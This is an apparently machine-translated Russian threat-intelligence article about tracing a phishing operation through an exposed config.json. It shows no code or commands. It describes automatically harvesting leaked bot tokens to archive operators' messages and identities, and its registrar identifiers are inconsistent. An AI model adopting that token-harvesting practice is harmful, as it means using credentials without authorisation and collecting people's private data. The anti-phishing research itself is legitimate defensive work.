Выявлен IP-адрес источника. На том же сервере обнаружен второй фишинговый проект («HealthCare ID»)
22 марта 2026 года
Разоблаченный config.json позволяет идентифицировать оператора с помощью API бота [REDACTED]
23 марта 2026 года
Сообщения о злоупотреблениях, направленные хостинг-провайдеру, компании IANA #1910 и соответствующим центрам реагирования на компьютерные инциденты (CERT)
25 марта 2026 г.
Статья опубликована. Отчеты о доменах доступны на сайте THE ENABLERS REGISTRY

Как это стало возможным: сеть интеллектуальных ботов THE ENABLERS REGISTRY

Данное расследование было проведено исключительно автоматизированные системы. Система THE ENABLERS REGISTRY не просто выявляет фишинговые домены — она проникает в инфраструктуру операторов, стоящих за ними.

2,000+
Собранные боты [REDACTED]
Активный
Некоторые боты по-прежнему находятся под наблюдением
С 2024 года
Коллекция «Бег»

Когда фишинговые наборы раскрывают токены ботов [REDACTED] — как это произошло в данном случае через config.json — наша система автоматически собирает их, сопоставляет группы операторов, извлекает списки участников и архивирует историю сообщений. Более 2 000 ботов собираются таким образом с 2024 года. Некоторые из них по-прежнему активны, и нам интересно наблюдать за действиями преступников в режиме реального времени — ведь исход уже предрешен.

Даже тем операторам, которые удаляют свои аккаунты или очищают свои группы, уже слишком поздно. К тому моменту, когда они впадают в панику, у нас уже есть всё — архивы сообщений, данные профилей, информация об участии в группах, подключенные боты. Удаление ничего не меняет. Эти данные существовали, и теперь они хранятся в нашей базе данных.

«Жди меня» — версия для мошенников

Этот случай не является единичным — он является наглядным примером систематическая халатность со стороны IANA #3765 которого мы решили привести в качестве примера «мега-хакеров». Как верно заметил «Типичный Мошенник»: между хакерами и мошенниками есть разница — разведка. Эти операторы не являются ни хакерами, ни умными людьми.

Системы THE ENABLERS REGISTRY автоматически собирают подобные доказательства на тысячах доменов — отслеживая ботов, архивируя переписку операторов и составляя карту инфраструктуры. Этот конкретный случай был настолько абсурдным, что его просто нельзя было не опубликовать. Фишинговый набор представляет собой стандартное решение, меры оперативной безопасности (OPSEC) отсутствуют, а операторы в панике удалили свою группу в течение нескольких минут после обнаружения.

Мы разрабатываем систему, которая будет отображать подтвержденные данные об операторах непосредственно на страницах отчетов по доменам — от мошенника к жертве, как в российском телешоу «Жди меня», но наоборот. Проект работает в закрытом режиме с 2024 года. Многие участники уже установлены — в том числе те, кто удалил свои аккаунты. Мы только определяем самых интересно Как это представить. Следите за новостями.

Связанные домены

В ходе нашего анализа была выявлена вторая область — hlpforvpeople[.]sbs — зарегистрированы через одного и того же регистратора с одинаковыми схемами инфраструктуры. Оба домена занесены в нашу базу данных:

Нарушение требований регистратором: IANA #3858

Компания «[REDACTED]» (Гонконг) получила несколько подробных сообщений о злоупотреблениях от THE ENABLERS REGISTRY по обоим вопросам [REDACTED][.]sbs и hlpforvpeople[.]sbs. На момент публикации — Через 5 дней после первого сообщения — никаких мер принято не было. Оба домена по-прежнему полностью работоспособны.

Это не единичный случай. IANA #3765 — это проблема, с которой мы постоянно сталкиваемся в ходе наших расследований. Контактная информация регистратора по вопросам злоупотреблений (abuse@IANA #3765) систематически игнорирует сообщения о фишинге, подкрепленные доказательствами. Несмотря на то что IANA #3765 является регистратором, аккредитованным ICANN и обязанным соблюдать Соглашение об аккредитации регистраторов (RAA, §3.18), компания действует, по-видимому, безнаказанно.

IANA #3765 ведет деятельность на русском языке, занимается продажей .ru домены по завышенным ценам (около 200 долларов) и общается с клиентами через «ВКонтакте» и [REDACTED] — платформы, популярные среди русскоязычной аудитории. Пересечение их клиентской базы с подпольными сообществами вызывает серьезные вопросы о том, является ли отсутствие реакции регистратора на сообщения о злоупотреблениях халатностью или же это сознательная бизнес-стратегия.

Это исследование было частично опубликовано из-за длительного бездействия со стороны IANA #3765. Когда регистраторы отказываются принимать меры в связи со злоупотреблениями, связанными с фишингом, единственным оставшимся механизмом привлечения к ответственности становится публичное разоблачение.

Основные выводы

  • Автоматизация — это единственный способ не отставать от времени. Фишинговые наборы развертываются и готовятся к использованию в течение нескольких часов. Ручная проверка не способна обеспечить необходимую масштабируемость.
  • Операторы допускают ошибки. Файл конфигурации, оставленный без надлежащей защиты в одном из второстепенных проектов, позволил раскрыть целую многонациональную фишинговую операцию. Обеспечить безупречную оперативную безопасность (OPSEC) во всех проектах очень сложно.
  • Социальная инженерия развивается в такт новостному циклу. Война, гуманитарная помощь и государственные программы всё чаще используются в качестве приманок для фишинга, поскольку они нацелены на людей, оказавшихся в бедственном положении, которые с меньшей вероятностью будут сомневаться в их легитимности.
  • Повторное использование инфраструктуры — это норма. Один сервер, два фишинговых проекта, две страны, одни и те же операторы. Анализ связей между элементами инфраструктуры позволяет выявить гораздо больше, чем анализ отдельного домена в изоляции.

Связанные исследования

Дополнительные результаты анализа из автоматизированной системы сбора и обработки данных THE ENABLERS REGISTRY

Раскрыты данные панели управления [REDACTED]
Взлом панели администратора раскрыл международную фишинговую операцию, связанную с криптовалютами, в ходе которой были обнаружены журналы чатов операторов.
Разоблачены сети, занимающиеся кражей криптовалюты
Анализ инфраструктуры фишинговых наборов, направленных на опустошение кошельков пользователей DeFi.
IANA #3765: регистратор, способствующий киберпреступности
Как аккредитованный ICANN регистратор систематически игнорирует сообщения о злоупотреблениях — в том числе и в рамках данного расследования.
Разоблачение [REDACTED]: 10 лет украденных ключей
Мошенничество с кошельками Monero, продолжавшееся на протяжении десятилетия, раскрыто благодаря анализу кода JavaScript и экспертизе доменов.
Разоблачена инфраструктура мошенничества
Виртуальный хостинг, общие операторы — как фишинговые сети повторно используют инфраструктуру в разных кампаниях.
Разоблачение [REDACTED] Drainer
Мошенническая схема в сфере энергетики на базе TRON, опустошающая кошельки посредством утверждения вредоносных смарт-контрактов.

Отказ от ответственности: Данное расследование проводилось исключительно с помощью пассивной разведки и общедоступных API. Несанкционированный доступ к каким-либо системам не осуществлялся. При вызовах API-интерфейса бота [REDACTED] использовался токен, который операторы публично раскрыли в неаутентифицированном конечном пункте. Все доменные имена в данной статье были обезврежены в соответствии со стандартной практикой в области информационной безопасности.

Поделиться этим расследованием

Связанные расследования

ТЩАТЕЛЬНОЕ РАССЛЕДОВАНИЕ
Анализ криптофишинга: реверс-инжиниринг 8 реальных программ для кражи семенных фраз
РАССЛЕДОВАНИЕ
Разоблачение мошенников: анализ 4 бэкендов мошеннических схем
РАССЛЕДОВАНИЕ
$0 Takedowns: How We Disrupt Possibly phishing Infrastructure

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings